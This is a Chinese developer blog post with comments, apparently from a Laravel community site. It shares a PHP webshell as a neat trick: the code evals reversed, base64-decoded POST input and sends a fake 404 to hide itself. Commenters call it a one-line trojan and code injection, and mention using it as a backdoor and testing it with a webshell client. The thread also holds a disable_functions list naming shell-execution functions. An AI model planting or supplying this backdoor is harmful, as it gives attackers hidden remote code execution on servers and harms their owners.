"打开一扇新的大门"

guoke0826 的个人博客 / 0 / 11 / 创建于 4年前 / 更新于 4年前

代码写这么多年，从来没往这方面想，前段时间一个做安全的同事给发了一段代码，原来 PHP 还能有这种骚操作，真是感觉为我打开了一扇新的大门，而这个函数服务器默认是不会禁用的，放这么一段代码就能玩一些骚操作了分享一下

<?php
class obj
{
    static public $params=null;
    function __construct($params="error"){
        self::$params=$params;
        @eval(null.self::$params);
    }
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');

本作品采用《CC 协议》，转载必须注明作者和本文链接

46 声望

桃李春风一杯酒，江湖夜雨十年灯

《L05 电商实战》

从零开发一个电商项目，功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等

《L04 微信小程序从零到发布》

从小程序个人账户申请开始，带你一步步进行开发一个微信小程序，直到提交微信控制台上线发布。

推荐文章：

更多推荐...

花了四个月打磨的 Laravel Plus 开源 28 / 96 |

冯老师的困惑 —— 一个跑了两年的 BUG 19 / 16 |

在laravel下实现全双工的websocket开发 21 / 8 |

无需修改任何代码和扩展将你的Laravel项目性能提高20倍 97 / 98 |

Laravel 实用小技巧——缓存标签的小秘密（下） 12 / 11 |

Laravel 实用小技巧——缓存标签的小秘密（上） 16 / 6 |

讨论数量: 11

lynzhen

课程读者 11 声望

eval 一般禁用

4年前评论

vinhson

不一定，好像默认是打开的吧

guoke0826 （楼主）

默认是没有禁用的，你可以查下

admin0

应该是禁用的吧。

guoke0826 （楼主）

disable_functions = passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server

EmptyCup

课程读者 37 声望

没看明白，拼接 null 是啥意思。

4年前评论

杨柳岸

Laravel 8.x 译者 55 声望

php 一句话木马，也很骚

4年前评论

parter

课程读者 20 声望

不知所云。。。

4年前评论

xujinhuan

见习助教 68 声望

虽然看不懂，感觉像病毒

4年前评论

guoke0826

46 声望

@EmptyCup 可能是个人习惯我直接复制过来的没什么意思

4年前评论

guoke0826

46 声望

@xujinhuan PHP 代码注入

4年前评论

wanghan

课程读者 105 声望 / PHP开发工程师 @ 无组织

没看懂

4年前评论

huqs

课程读者 12 声望

@wanghan 安全问题，代码注入。主要是 eval 函数，eval 能把字符串当成 php 语句来执行，当前例子，字符串由外界输入控制，所以外界输入什么，内部就会执行什么。

4年前评论

wanghan

谢谢

oneSmile

课程读者 118 声望

跑路前给自己留下的通行证🤪

4年前评论

qqww11

课程读者 14 声望

拔出菜刀，试一试哈，被拦截了...@eval ( 这个特征码太明显

4年前评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容，与人为善，比聪明更重要！

帮助

未填写

私信

文章归档

1 篇 2020 年 6 月

4年前 "打开一扇新的大门"

2 "打开一扇新的大门"

成为赞助商